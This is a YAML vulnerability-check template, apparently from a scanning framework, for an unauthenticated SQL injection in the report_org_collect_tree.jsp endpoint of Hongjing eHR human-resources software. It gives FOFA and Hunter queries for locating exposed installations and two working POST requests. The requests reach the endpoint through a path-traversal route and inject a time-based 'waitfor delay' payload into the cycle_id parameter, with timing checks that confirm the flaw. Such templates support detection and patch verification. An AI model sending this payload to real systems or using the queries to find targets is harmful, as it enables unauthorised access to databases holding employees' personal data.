product: 宏景eHR人力资源信息管理系统
vName: 宏景eHR report_org_collect_tree.jsp接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 宏景eHR report_org_collect_tree.jsp 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/136924942
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp
      data: params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--+
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: post
      follow: false
      path: /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp
      data: params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:0'--+
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3